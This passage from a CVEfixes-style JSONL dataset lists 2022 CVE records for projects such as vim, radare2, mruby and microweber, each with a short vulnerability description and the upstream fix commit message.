"CVE-2022-0522", "source": "cvefixes", "timestamp": ""} {"id": "48bc6f806a72a7fb0470", "text": "CVE: CVE-2022-0523\n\n[{'lang': 'en', 'value': 'Expired Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Fix UAF in pyc parser ##crash\n\n* Reported by Cen Zhang via huntr.dev\n* Reproducer: bins/fuzzed/harep2.pyc", "cve_id": "CVE-2022-0523", "source": "cvefixes", "timestamp": ""} {"id": "6a7a17e67046bda6f24e", "text": "CVE: CVE-2022-0524\n\n[{'lang': 'en', 'value': 'Business Logic Errors in GitHub repository publify/publify prior to 9.2.7.'}]\n\nFix commit: Fix setting the article password from the Admin\n\nThe password field was present in the form, but not accepted by the\ncontroller. This change adds password to the list of accepted fields.", "cve_id": "CVE-2022-0524", "source": "cvefixes", "timestamp": ""} {"id": "fb0acace8fd69fab4be7", "text": "CVE: CVE-2022-0525\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: stack position may be wrong on assignments.\n\nWhen `[]=` access includes keyword arguments.", "cve_id": "CVE-2022-0525", "source": "cvefixes", "timestamp": ""} {"id": "1dc7dab1d291bfcb9c05", "text": "CVE: CVE-2022-0526\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository chatwoot/chatwoot prior to 2.2.0.'}]\n\nFix commit: fix: Render valid urls only in custom attributes (#3921)", "cve_id": "CVE-2022-0526", "source": "cvefixes", "timestamp": ""} {"id": "e63937612958ce707fb8", "text": "CVE: CVE-2022-0527\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository chatwoot/chatwoot prior to 2.2.0.'}]\n\nFix commit: fix: Ongoing campaign URL validation (#3890)", "cve_id": "CVE-2022-0527", "source": "cvefixes", "timestamp": ""} {"id": "49c573c5d53bda3b1ac0", "text": "CVE: CVE-2022-0528\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository transloadit/uppy prior to 3.3.1.'}]\n\nFix commit: replace debug\n\nremove debug flag\ninstead add allowLocalUrls (COMPANION_ALLOW_LOCAL_URLS)\nwhich defaults to false\nthis fixes https://huntr.dev/bounties/8b060cc3-2420-468e-8293-b9216620175b/\n\nalso don't allow localhost for any providers getURLMeta", "cve_id": "CVE-2022-0528", "source": "cvefixes", "timestamp": ""} {"id": "73eb0bccecacbab4373d", "text": "CVE: CVE-2022-0534\n\n[{'lang': 'en', 'value': 'A vulnerability was found in htmldoc version 1.9.15 where the stack out-of-bounds read takes place in gif_get_code() and occurs when opening a malicious GIF file, which can result in a crash (segmentation fault).'}]\n\nFix commit: Block GIF images with a code size > 12 (Issue #463)", "cve_id": "CVE-2022-0534", "source": "cvefixes", "timestamp": ""} {"id": "8a3bdeeb9be520069ac5", "text": "CVE: CVE-2022-0536\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.'}]\n\nFix commit: Drop confidential headers across schemes.", "cve_id": "CVE-2022-0536", "source": "cvefixes", "timestamp": ""} {"id": "0ce4e2dc66a341e7e627", "text": "CVE: CVE-2022-0539\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist ptrofimov/beanstalk_console prior to 1.7.14.'}]\n\nFix commit: applying htmlspecialchars for sanitization output\nFix issue XSS\nDisclosure : https://huntr.dev/bounties/5f41b182-dda2-4c6f-9668-2a9afaed53af/", "cve_id": "CVE-2022-0539", "source": "cvefixes", "timestamp": ""} {"id": "95595bf239780273a63c", "text": "CVE: CVE-2022-0542\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - DOM in GitHub repository chatwoot/chatwoot prior to 2.7.0.'}]\n\nFix commit: fix: Handle unsanitized markup in DOM (#4110)", "cve_id": "CVE-2022-0542", "source": "cvefixes", "timestamp": ""} {"id": "9dfa24108952a211a2a2", "text": "CVE: CVE-2022-0552\n\n[{'lang': 'en', 'value': 'A flaw was found in the original fix for the netty-codec-http CVE-2021-21409, where the OpenShift Logging openshift-logging/elasticsearch6-rhel8 container was incomplete. The vulnerable netty-codec-http maven package was not removed from the image content. This flaw affects origin-aggregated-logging versions 3.11.'}]\n\nFix commit: Update netty to 4.1.63", "cve_id": "CVE-2022-0552", "source": "cvefixes", "timestamp": ""} {"id": "574d1e12eda553447fdb", "text": "CVE: CVE-2022-0554\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4327: may end up with no current buffer\n\nProblem: May end up with no current buffer.\nSolution: When deleting the current buffer to not pick a quickfix buffer as\n the new current buffer.", "cve_id": "CVE-2022-0554", "source": "cvefixes", "timestamp": ""} {"id": "7dd4f1b96bdf3eaef956", "text": "CVE: CVE-2022-0557\n\n[{'lang': 'en', 'value': 'OS Command Injection in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update plupload.php", "cve_id": "CVE-2022-0557", "source": "cvefixes", "timestamp": ""} {"id": "6fd5b6c84b43a88a10d9", "text": "CVE: CVE-2022-0558\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: xss fix on tagging module", "cve_id": "CVE-2022-0558", "source": "cvefixes", "timestamp": ""} {"id": "f5aa2fa501e37e351cde", "text": "CVE: CVE-2022-0559\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository radareorg/radare2 prior to 5.6.2.'}]\n\nFix commit: Prefer memleak over usaf in io.bank's rbtree bug ##crash\n\n* That's a workaround, proper fix will come later\n* Reproducer: bins/fuzzed/iobank-crash\n* Reported by Akyne Choi via huntr.dev", "cve_id": "CVE-2022-0559", "source": "cvefixes", "timestamp": ""} {"id": "f574ce2e9ea80a7c65b8", "text": "CVE: CVE-2022-0560\n\n[{'lang': 'en', 'value': 'Open Redirect in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0560", "source": "cvefixes", "timestamp": ""} {"id": "7d14edccca8fce892c75", "text": "CVE: CVE-2022-0565\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in Packagist pimcore/pimcore prior to 10.3.1.'}]\n\nFix commit: Svg sanitization (#11386)\n\n* setting up the svg saniziter on logo and assets upload\r\n\r\n* more detailed exception message\r\n\r\n* changed to mime type check instead of file extension\r\n\r\n* adding the sanitization to \"Upload new version\"\r\n\r\n* refactor to sanitize on preAdd/preUpdate, rollback AssetController.php\r\n\r\n* fix resource|string,", "cve_id": "CVE-2022-0565", "source": "cvefixes", "timestamp": ""} {"id": "014c3bcd7245c3748ed7", "text": "CVE: CVE-2022-0569\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in Packagist snipe/snipe-it prior to v5.3.9.'}]\n\nFix commit: Updated language string\n\nSigned-off-by: snipe ", "cve_id": "CVE-2022-0569", "source": "cvefixes", "timestamp": ""} {"id": "9f255dd4f13c8d85f120", "text": "CVE: CVE-2022-0570\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: fix a bug in `gen_values()`.\n\n- Fix limit handling that fails 15 arguments method calls.\n- Fix too early argument packing in arrays.", "cve_id": "CVE-2022-0570", "source": "cvefixes", "timestamp": ""} {"id": "82a82051d5570081395e", "text": "CVE: CVE-2022-0571\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository phoronix-test-suite/phoronix-test-suite prior to 10.8.2.'}]\n\nFix commit: phoromatic: Reject HTML encoded character input and other strings that likely have no use within the context of Phoromatic inputs", "cve_id": "CVE-2022-0571", "source": "cvefixes", "timestamp": ""} {"id": "0dc863aa3046e6322ba4", "text": "CVE: CVE-2022-0572\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4359: crash when repeatedly using :retab\n\nProblem: crash when repeatedly using :retab.\nSolution: Bail out when the line is getting too long.", "cve_id": "CVE-2022-0572", "source": "cvefixes", "timestamp": ""} {"id": "ef723f1e203f4921e0d4", "text": "CVE: CVE-2022-0574\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository publify/publify prior to 9.2.8.'}]\n\nFix commit: Do not allow comments on Article if not published", "cve_id": "CVE-2022-0574", "source": "cvefixes", "timestamp": ""} {"id": "d7d47f9b26b88994fdc1", "text": "CVE: CVE-2022-0575\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.2.0.'}]\n\nFix commit: XSS fix, cont. (#13776)\n\nhttps://huntr.dev/bounties/13951f51-deed-4a3d-8275-52306cc5a87d/", "cve_id": "CVE-2022-0575", "source": "cvefixes", "timestamp": ""} {"id": "218340ec424837d025ac", "text": "CVE: CVE-2022-0576\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in Packagist librenms/librenms prior to 22.1.0.'}]\n\nFix commit: security - XSS Fix 01\n\nfixing https://huntr.dev/bounties/114ba055-a2f0-4db9-aafb-95df944ba177/ (#13775)", "cve_id": "CVE-2022-0576", "source": "cvefixes", "timestamp": ""} {"id": "d1549d8f8b9af34a394f", "text": "CVE: CVE-2022-0577\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository scrapy/scrapy prior to 2.6.1.'}]\n\nFix commit: Merge pull request from GHSA-cjvr-mfj7-j4j8\n\n* Do not carry over cookies to a different domain on redirect\n\n* Cover the cookie-domain redirect fix in the release notes\n\n* Cover 1.8.2 in the release notes\n\n* Fix redirect Cookie handling when the cookie middleware is disabled\n\n* Update the 1.8.2 release date", "cve_id": "CVE-2022-0577", "source": "cvefixes", "timestamp": ""} {"id": "0f21969d102e821b5dec", "text": "CVE: CVE-2022-0578\n\n[{'lang': 'en', 'value': 'Code Injection in GitHub repository publify/publify prior to 9.2.8.'}]\n\nFix commit: Do not allow images in comments", "cve_id": "CVE-2022-0578", "source": "cvefixes", "timestamp": ""} {"id": "d90c8333d75c6692e7b3", "text": "CVE: CVE-2022-0579\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in Packagist snipe/snipe-it prior to 5.3.9.'}]\n\nFix commit: Merge pull request #10665 from snipe/fixes/adds_gate_to_supplier_view\n\nAdds gate to supplier", "cve_id": "CVE-2022-0579", "source": "cvefixes", "timestamp": ""} {"id": "e09f3ba67e9ad98b5393", "text": "CVE: CVE-2022-0580\n\n[{'lang': 'en', 'value': 'Improper Access Control in Packagist librenms/librenms prior to 22.2.0.'}]\n\nFix commit: Moved some pages to be within admin route (#13782)\n\n* Moved plugin admin pages to be within admin route\r\n* Wrap html transports page in admin check\r\n* Moved Port group controller to be admin protected\r\n* fixed tests", "cve_id": "CVE-2022-0580", "source": "cvefixes", "timestamp": ""} {"id": "4290bfe58573cc358c3a", "text": "CVE: CVE-2022-0587\n\n[{'lang': 'en', 'value': 'Improper Authorization in Packagist librenms/librenms prior to 22.2.0.'}]\n\nFix commit: Moved some pages to be within admin route (#13782)\n\n* Moved plugin admin pages to be within admin route\r\n* Wrap html transports page in admin check\r\n* Moved Port group controller to be admin protected\r\n* fixed tests", "cve_id": "CVE-2022-0587", "source": "cvefixes", "timestamp": ""} {"id": "e395f7169b136ca5d6f7", "text": "CVE: CVE-2022-0588\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in Packagist librenms/librenms prior to 22.2.0.'}]\n\nFix commit: Moved some pages to be within admin route (#13782)\n\n* Moved plugin admin pages to be within admin route\r\n* Wrap html transports page in admin check\r\n* Moved Port group controller to be admin protected\r\n* fixed tests", "cve_id": "CVE-2022-0588", "source": "cvefixes", "timestamp": ""} {"id": "515a882fd679542f13b6", "text": "CVE: CVE-2022-0589\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.'}]\n\nFix commit: XSS fixes (#13780)", "cve_id": "CVE-2022-0589", "source": "cvefixes", "timestamp": ""} {"id": "040877aa689a3f1e8933", "text": "CVE: CVE-2022-0596\n\n[{'lang': 'en', 'value': 'Business Logic Errors in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update AdminMakeInstall.php", "cve_id": "CVE-2022-0596", "source": "cvefixes", "timestamp": ""} {"id": "c6ef34e551cf4a865f4a", "text": "CVE: CVE-2022-0597\n\n[{'lang': 'en', 'value': 'Open Redirect in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Merge branch 'dev' of https://github.com/microweber/microweber into dev", "cve_id": "CVE-2022-0597", "source": "cvefixes", "timestamp": ""} {"id": "e7c394c6dcc5a7b2446b", "text": "CVE: CVE-2022-0602\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - DOM in GitHub repository tastyigniter/tastyigniter prior to 3.3.0.'}]\n\nFix commit: Minor fixes\n\nSigned-off-by: Sam Poyigi <6567634+sampoyigi@users.noreply.github.com>", "cve_id": "CVE-2022-0602", "source": "cvefixes", "timestamp": ""} {"id": "9bef098190eed0b5c48f", "text": "CVE: CVE-2022-0611\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in Packagist snipe/snipe-it prior to 5.3.11.'}]\n\nFix commit: Merge pull request #10672 from snipe/fixes/missing_gates_for_maintenances\n\nAdded Asset edit/delete gates to maintenances", "cve_id": "CVE-2022-0611", "source": "cvefixes", "timestamp": ""} {"id": "ce4f131e0bd25338018d", "text": "CVE: CVE-2022-0612\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist remdex/livehelperchat prior to 3.93v.'}]\n\nFix commit: Non bindable logo", "cve_id": "CVE-2022-0612", "source": "cvefixes", "timestamp": ""} {"id": "0d6e46af8385281ccb44", "text": "CVE: CVE-2022-0613\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8.'}]\n\nFix commit: fix(parse): case insensitive scheme - #412", "cve_id": "CVE-2022-0613", "source": "cvefixes", "timestamp": ""} {"id": "a71932e286273a74be94", "text": "CVE: CVE-2022-0614\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in Homebrew mruby prior to 3.2.'}]\n\nFix commit: vm.c: should check type before hash access.\n\nSince the operand of double splat (`**`) may not be a hash, simple\nassertion (previous code since d42a64e) was not enough for this case.", "cve_id": "CVE-2022-0614", "source": "cvefixes", "timestamp": ""} {"id": "d5e14169f73d1c18cc8c", "text": "CVE: CVE-2022-0622\n\n[{'lang': 'en', 'value': 'Generation of Error Message Containing Sensitive Information in Packagist snipe/snipe-it prior to 5.3.11.'}]\n\nFix commit: Added usleep :(\n\nSigned-off-by: snipe ", "cve_id": "CVE-2022-0622", "source": "cvefixes", "timestamp": ""} {"id": "5f64c9bd508948b28eef", "text": "CVE: CVE-2022-0623\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in Homebrew mruby prior to 3.2.'}]\n\nFix commit: vm.c: should check type before hash access.\n\nSince the operand of double splat (`**`) may not be a hash, simple\nassertion (previous code since d42a64e) was not enough for this case.", "cve_id": "CVE-2022-0623", "source": "cvefixes", "timestamp": ""} {"id": "7131403e412b23667895", "text": "CVE: CVE-2022-0624\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in GitHub repository ionicabizau/parse-path prior to 5.0.0.'}]\n\nFix commit: Refactor the codebase to make it more secure", "cve_id": "CVE-2022-0624", "source": "cvefixes", "timestamp": ""} {"id": "116e03a05334ee8d0287", "text": "CVE: CVE-2022-0629\n\n[{'lang': 'en', 'value': 'Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4397: crash when using many composing characters in error message\n\nProblem: Crash when using many composing characters in error message.\nSolution: Use mb_cptr2char_adv() instead of mb_ptr2char_adv().", "cve_id": "CVE-2022-0629", "source": "cvefixes", "timestamp": ""} {"id": "3fe37994530271d0338e", "text": "CVE: CVE-2022-0630\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in Homebrew mruby prior to 3.2.'}]\n\nFix commit: vm.c: should check type before hash access.\n\nSince the operand of double splat (`**`) may not be a hash, simple\nassertion (previous code since d42a64e) was not enough for this case.", "cve_id": "CVE-2022-0630", "source": "cvefixes", "timestamp": ""} {"id": "514c85e1e2d5b156ab11", "text": "CVE: CVE-2022-0631\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in Homebrew mruby prior to 3.2.'}]\n\nFix commit: vm.c: packed arguments length may be zero for `send` method.", "cve_id": "CVE-2022-0631", "source": "cvefixes", "timestamp": ""} {"id": "c9ba795ffb9c00b684ae", "text": "CVE: CVE-2022-0632\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: adjust stack position for `OP_SUPER` instruction.", "cve_id": "CVE-2022-0632", "source": "cvefixes", "timestamp": ""} {"id": "084770ecd6343f4f16b5", "text": "CVE: CVE-2022-0638\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update UserLogoutController.php", "cve_id": "CVE-2022-0638", "source": "cvefixes", "timestamp": ""} {"id": "856e98c68c4b83ac24f7", "text": "CVE: CVE-2022-0639\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.7.'}]\n\nFix commit: [fix] Readd the empty userinfo to `url.href` (#226)\n\nIf the userinfo is present but empty, the parsed host is also empty, and\r\n`url.pathname` is not `'/'`, then readd the empty userinfo to `url.href`,\r\notherwise the original invalid URL might be transformed into a valid one\r\nwith `url.pathname` as host.", "cve_id": "CVE-2022-0639", "source": "cvefixes", "timestamp": ""} {"id": "362b3a448dd10e130ec0", "text": "CVE: CVE-2022-0645\n\n[{'lang': 'en', 'value': 'Open redirect vulnerability via endpoint authorize_and_redirect/?redirect= in GitHub repository posthog/posthog prior to 1.34.1.'}]\n\nFix commit: fix(toolbar): only redirect to hosts in app_urls (#9268)\n\n* fix(toolbar): only redirect to hosts in app_urls\r\n\r\n* fix mypy and regex", "cve_id": "CVE-2022-0645", "source": "cvefixes", "timestamp": ""} {"id": "b7fc23e8d7a359d195ee", "text": "CVE: CVE-2022-0654\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0.'}]\n\nFix commit: Prevent Cookie & Authorization Headers from being forwarded when the URL redirects to another domain (information leak) #137", "cve_id": "CVE-2022-0654", "source": "cvefixes", "timestamp": ""} {"id": "1d5cb4d71a21f6670732", "text": "CVE: CVE-2022-0660\n\n[{'lang': 'en', 'value': 'Generation of Error Message Containing Sensitive Information in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update Comment.php", "cve_id": "CVE-2022-0660", "source": "cvefixes", "timestamp": ""} {"id": "7a91111a02951cd4ebbb", "text": "CVE: CVE-2022-0664\n\n[{'lang': 'en', 'value': 'Use of Hard-coded Cryptographic Key in Go github.com/gravitl/netmaker prior to 0.8.5,0.9.4,0.10.0,0.10.1.'}]\n\nFix commit: hotfix 2", "cve_id": "CVE-2022-0664", "source": "cvefixes", "timestamp": ""} {"id": "a46b911fdd7f6ab61963", "text": "CVE: CVE-2022-0665\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository pimcore/pimcore prior to 10.3.2.'}]\n\nFix commit: [Admin] Translations - use session for file import to prevent path traversal - Merge PR #11498", "cve_id": "CVE-2022-0665", "source": "cvefixes", "timestamp": ""} {"id": "3ab7f3b5be51d53f20d2", "text": "CVE: CVE-2022-0666\n\n[{'lang': 'en', 'value': 'CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update UrlManager.php", "cve_id": "CVE-2022-0666", "source": "cvefixes", "timestamp": ""} {"id": "5446da1a2c2b7861ff10", "text": "CVE: CVE-2022-0676\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.6.4.'}]\n\nFix commit: Fix heap buffer overflow in dyldcache parser ##crash\n\n* Reported by: Lazymio via huntr.dev\n* Reproducer: dyldovf", "cve_id": "CVE-2022-0676", "source": "cvefixes", "timestamp": ""} {"id": "a058d1005e26b51b27ed", "text": "CVE: CVE-2022-0678\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update UrlManager.php", "cve_id": "CVE-2022-0678", "source": "cvefixes", "timestamp": ""} {"id": "9a4474b950194bf853cd", "text": "CVE: CVE-2022-0685\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 8.2.4418.'}]\n\nFix commit: patch 8.2.4418: crash when using special multi-byte character\n\nProblem: Crash when using special multi-byte character.\nSolution: Don't use isalpha() for an arbitrary character.", "cve_id": "CVE-2022-0685", "source": "cvefixes", "timestamp": ""} {"id": "4cb1487853de332c4501", "text": "CVE: CVE-2022-0686\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.8.'}]\n\nFix commit: [fix] Handle the case where the port is specified but empty", "cve_id": "CVE-2022-0686", "source": "cvefixes", "timestamp": ""} {"id": "dfad67a224527d7bad41", "text": "CVE: CVE-2022-0688\n\n[{'lang': 'en', 'value': 'Business Logic Errors in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0688", "source": "cvefixes", "timestamp": ""} {"id": "6803a4d5e030eb036faa", "text": "CVE: CVE-2022-0689\n\n[{'lang': 'en', 'value': 'Use multiple time the one-time coupon in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0689", "source": "cvefixes", "timestamp": ""} {"id": "bc1c30eed665268f3003", "text": "CVE: CVE-2022-0690\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0690", "source": "cvefixes", "timestamp": ""} {"id": "db568f0175f2fef1d9cf", "text": "CVE: CVE-2022-0691\n\n[{'lang': 'en', 'value': 'Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.9.'}]\n\nFix commit: [fix] Strip all control characters from the beginning of the URL", "cve_id": "CVE-2022-0691", "source": "cvefixes", "timestamp": ""} {"id": "1c16eaf7092d5495141a", "text": "CVE: CVE-2022-0692\n\n[{'lang': 'en', 'value': 'Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1.'}]\n\nFix commit: Don't redirect to REQUEST_URI when browsing to index.php\nInstead, we can make sure everything works correctly on index.php", "cve_id": "CVE-2022-0692", "source": "cvefixes", "timestamp": ""} {"id": "a0941ee7043d81ba36d9", "text": "CVE: CVE-2022-0695\n\n[{'lang': 'en', 'value': 'Denial of Service in GitHub repository radareorg/radare2 prior to 5.6.4.'}]\n\nFix commit: Fix DoS in PE/QNX/DYLDCACHE/PSX parsers ##crash\n\n* Reported by lazymio\n* Reproducer: AAA4AAAAAB4=", "cve_id": "CVE-2022-0695", "source": "cvefixes", "timestamp": ""} {"id": "4b3e5d661c081ee0ecd2", "text": "CVE: CVE-2022-0696\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.4428.'}]\n\nFix commit: patch 8.2.4428: crash when switching tabpage while in the cmdline window\n\nProblem: Crash when switching tabpage while in the cmdline window.\nSolution: Disallow switching tabpage when in the cmdline window.", "cve_id": "CVE-2022-0696", "source": "cvefixes", "timestamp": ""} {"id": "400e7019466cde383b7d", "text": "CVE: CVE-2022-0697\n\n[{'lang': 'en', 'value': 'Open Redirect in GitHub repository archivy/archivy prior to 1.7.0.'}]\n\nFix commit: fix open redirect", "cve_id": "CVE-2022-0697", "source": "cvefixes", "timestamp": ""} {"id": "f80001daa7a5373b03ae", "text": "CVE: CVE-2022-0704\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enab", "cve_id": "CVE-2022-0704", "source": "cvefixes", "timestamp": ""} {"id": "0c7cdeb7e39d74b5813f", "text": "CVE: CVE-2022-0705\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enab", "cve_id": "CVE-2022-0705", "source": "cvefixes", "timestamp": ""} {"id": "1b5796288683cb233dc7", "text": "CVE: CVE-2022-0711\n\n[{'lang': 'en', 'value': 'A flaw was found in the way HAProxy processed HTTP responses containing the \"Set-Cookie2\" header. This flaw could allow an attacker to send crafted HTTP response packets which lead to an infinite loop, eventually resulting in a denial of service condition. The highest threat from this vulnerability is availability.'}]\n\nFix commit: BUG/MAJOR: http/htx: prevent unbounded loop in http_manage_server_side_cookies\n\nEnsure calls to http_find_header() termin", "cve_id": "CVE-2022-0711", "source": "cvefixes", "timestamp": ""} {"id": "3bf5846e53fe097e0619", "text": "CVE: CVE-2022-0712\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.6.4.'}]\n\nFix commit: Fix null deref in bin.symbols ##crash\n\n* Reported by cnitlrt via huntr.dev", "cve_id": "CVE-2022-0712", "source": "cvefixes", "timestamp": ""} {"id": "4265e3774730a042728e", "text": "CVE: CVE-2022-0713\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.6.4.'}]\n\nFix commit: Fix oobread in macho core symbolication ##crash\n\n* Reported by @cnitlrt via huntr.dev", "cve_id": "CVE-2022-0713", "source": "cvefixes", "timestamp": ""} {"id": "f0af327b85eeba0d7dd1", "text": "CVE: CVE-2022-0714\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.4436.'}]\n\nFix commit: patch 8.2.4436: crash with weird 'vartabstop' value\n\nProblem: Crash with weird 'vartabstop' value.\nSolution: Check for running into the end of the line.", "cve_id": "CVE-2022-0714", "source": "cvefixes", "timestamp": ""} {"id": "62134d050769146ac3f8", "text": "CVE: CVE-2022-0717\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository mruby/mruby prior to 3.2.'}]\n\nFix commit: codegen.c: fix a argument generation bug in array assignment.", "cve_id": "CVE-2022-0717", "source": "cvefixes", "timestamp": ""} {"id": "9ad3f2f2a439886599a9", "text": "CVE: CVE-2022-0719\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update UrlManager.php", "cve_id": "CVE-2022-0719", "source": "cvefixes", "timestamp": ""} {"id": "59ecbce590ca95f675d0", "text": "CVE: CVE-2022-0721\n\n[{'lang': 'en', 'value': 'Insertion of Sensitive Information Into Debugging Code in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update Handler.php", "cve_id": "CVE-2022-0721", "source": "cvefixes", "timestamp": ""} {"id": "17d7f86b06b8218f40d2", "text": "CVE: CVE-2022-0722\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "cve_id": "CVE-2022-0722", "source": "cvefixes", "timestamp": ""} {"id": "22858225f5e7ec30fa5c", "text": "CVE: CVE-2022-0723\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0723", "source": "cvefixes", "timestamp": ""} {"id": "330a33ec69968a3d2d4e", "text": "CVE: CVE-2022-0724\n\n[{'lang': 'en', 'value': 'Insecure Storage of Sensitive Information in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update plupload.php", "cve_id": "CVE-2022-0724", "source": "cvefixes", "timestamp": ""} {"id": "52fa4b9fa813b4f8fab2", "text": "CVE: CVE-2022-0726\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0.'}]\n\nFix commit: Check video privacy when creating comments/rates", "cve_id": "CVE-2022-0726", "source": "cvefixes", "timestamp": ""} {"id": "2b89767432a95a665b31", "text": "CVE: CVE-2022-0727\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository chocobozzz/peertube prior to 4.1.0.'}]\n\nFix commit: Check video privacy when creating comments/rates", "cve_id": "CVE-2022-0727", "source": "cvefixes", "timestamp": ""} {"id": "fda5f687db6fadfba6cd", "text": "CVE: CVE-2022-0729\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim 